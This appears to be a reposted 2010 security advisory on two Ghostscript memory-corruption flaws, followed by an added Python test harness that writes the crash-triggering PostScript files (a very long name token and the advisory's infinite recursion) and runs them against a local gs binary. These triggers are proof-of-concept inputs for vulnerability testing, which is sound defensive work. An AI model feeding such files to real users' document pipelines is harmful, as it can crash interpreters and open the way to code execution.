Ghostscript, multiple arbitrary code execution vulnerabilities

2010.05.25
Credit: Dan Rosenberg
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

===============================================================
Ghostscript, multiple arbitrary code execution vulnerabilities
May 11, 2010
CVE-2010-1869
===============================================================

==Description==

Ghostscript (www.ghostscript.com), an interpreter for the PostScript language, is vulnerable to two memory corruption vulnerabilities:

1. A stack overflow in the parser for Ghostscript versions 8.64 and 8.70 occurs when very long identifiers are provided within a PostScript file. By enticing a user to open a maliciously crafted PostScript file, arbitrary code execution can be achieved. This vulnerability was reported to downstream distributions by me on March 4, 2010. An anonymous researcher independently published this vulnerability today (May 11, 2010), prompting this advisory. This issue has been assigned CVE-2010-1869.

2. Ghostscript (all tested versions) fails to properly handle infinitely recursive procedure invocations. By providing a PostScript file with a sequence such as:

    /A{pop 0 A 0} bind def
    /product A 0

the interpreter's internal stack will be overflowed with recursive calls, at which point execution will jump to an attacker-controlled address. This vulnerability can be exploited by enticing a user to open a maliciously crafted PostScript file, achieving arbitrary code execution. This issue has not yet been assigned a CVE identifier.

==Solution==

In the absence of a patch, users are encouraged to discontinue use of Ghostscript or avoid processing untrusted PostScript files.

==Credits==

These vulnerabilities were discovered by Dan Rosenberg (dan.j.rosenberg (at) gmail (dot) com).

==Timeline==

3/04/10 - Initial report to downstream distribution
5/11/10 - Anonymous researcher discloses first issue
5/11/10 - Disclosure

==References==

CVE identifier CVE-2010-1869 has been assigned to the first issue.
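The advisory gives the recursion sequence verbatim and describes the first trigger only as "very long identifiers". The harness below is an added example, written for this page; it is not part of Dan Rosenberg's advisory and not Ghostscript project code. It generates one PostScript file per issue, feeds each to a `gs` binary if one is on PATH (or is passed explicitly), and classifies the exit: killed by a signal (memory corruption reached), rejected with a PostScript error (what a build that handles the input should do), or processed cleanly. The exact form and length of the long name token, the `gs` flags (`-dSAFER -dBATCH -dNOPAUSE -sDEVICE=nullpage`), and the 65536-byte name length are assumptions, not values from the advisory. Run it only against a disposable Ghostscript install: on an affected build these inputs crash the interpreter.

```python
"""Test harness for the two Ghostscript triggers in the advisory above.

Added example; not part of the original advisory and not Ghostscript project code.
Assumptions: a `gs` binary on PATH (or passed explicitly), and that a file whose
only unusual content is one very long name token is a fair stand-in for the
"very long identifiers" the advisory describes. Run it only against a
disposable Ghostscript install: on an affected build the input crashes the
interpreter.
"""
import os
import shutil
import subprocess
import tempfile

# Assumed value, not taken from the advisory; the real threshold depends on the
# scanner's fixed-size buffer, which the advisory does not give.
DEFAULT_NAME_LENGTH = 65536


def long_identifier_ps(length=DEFAULT_NAME_LENGTH):
    """First issue: a PostScript file containing a single very long name token.

    The name is defined and then executed, so the scanner reads it twice.
    """
    name = "A" * length
    return "%!PS\n/" + name + " 1 def\n" + name + " pop\nshowpage\n"


def infinite_recursion_ps():
    """Second issue: the advisory's own unbounded recursion, reproduced verbatim.

    `A` pops its argument, pushes 0, calls itself, then pushes 0; there is no base case.
    """
    return "%!PS\n/A{pop 0 A 0} bind def\n/product A 0\n"


def run_ghostscript(ps_source, gs_path=None, timeout=60):
    """Feed ps_source to gs and report how it exited. Returns None if gs is absent."""
    gs = gs_path or shutil.which("gs")
    if gs is None:
        return None
    fd, path = tempfile.mkstemp(suffix=".ps")
    with os.fdopen(fd, "w") as f:
        f.write(ps_source)
    try:
        proc = subprocess.run(
            [gs, "-dSAFER", "-dBATCH", "-dNOPAUSE", "-sDEVICE=nullpage", path],
            capture_output=True,
            timeout=timeout,
        )
        return {
            "returncode": proc.returncode,
            "stderr": proc.stderr.decode("utf-8", errors="replace"),
        }
    except subprocess.TimeoutExpired:
        return {"returncode": None, "stderr": "timed out after %ds" % timeout}
    finally:
        os.unlink(path)


def classify_outcome(result):
    """Translate a run_ghostscript() result into a verdict string.

    On POSIX a negative return code means the process was killed by a signal
    (SIGSEGV is 11 on Linux): memory corruption was reached. A positive non-zero
    code is how gs reports a PostScript-level error such as /execstackoverflow,
    i.e. the input was rejected rather than crashing the interpreter.
    """
    if result is None:
        return "gs not installed"
    rc = result["returncode"]
    if rc is None:
        return "timed out"
    if rc < 0:
        return "crashed by signal %d" % -rc
    if rc != 0:
        return "rejected with a PostScript error (exit %d)" % rc
    return "processed without error"


if __name__ == "__main__":
    for label, source in (("long identifier", long_identifier_ps()),
                          ("infinite recursion", infinite_recursion_ps())):
        print("%s: %s" % (label, classify_outcome(run_ghostscript(source))))
```

A build that handles the second input correctly should exit with a PostScript error (Ghostscript reports execution stack exhaustion as /execstackoverflow) rather than being killed by a signal; a signal-terminated run on either input reproduces the memory corruption the advisory describes and is the signal to upgrade or stop processing untrusted PostScript.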
The original report for this bug can be found at: https://bugs.launchpad.net/ubuntu/+source/ghostscript/+bug/546009

References:

https://bugs.launchpad.net/ubuntu/+source/ghostscript/+bug/546009
http://www.vupen.com/english/advisories/2010/1138
http://www.securityfocus.com/bid/40107
http://www.securityfocus.com/archive/1/archive/1/511243/100/0/threaded
http://www.openwall.com/lists/oss-security/2010/05/18/7
http://www.openwall.com/lists/oss-security/2010/05/12/1
http://secunia.com/advisories/39753
http://seclists.org/fulldisclosure/2010/May/134
http://bugs.ghostscript.com/show_bug.cgi?id=691295


Copyright 2024, cxsecurity.com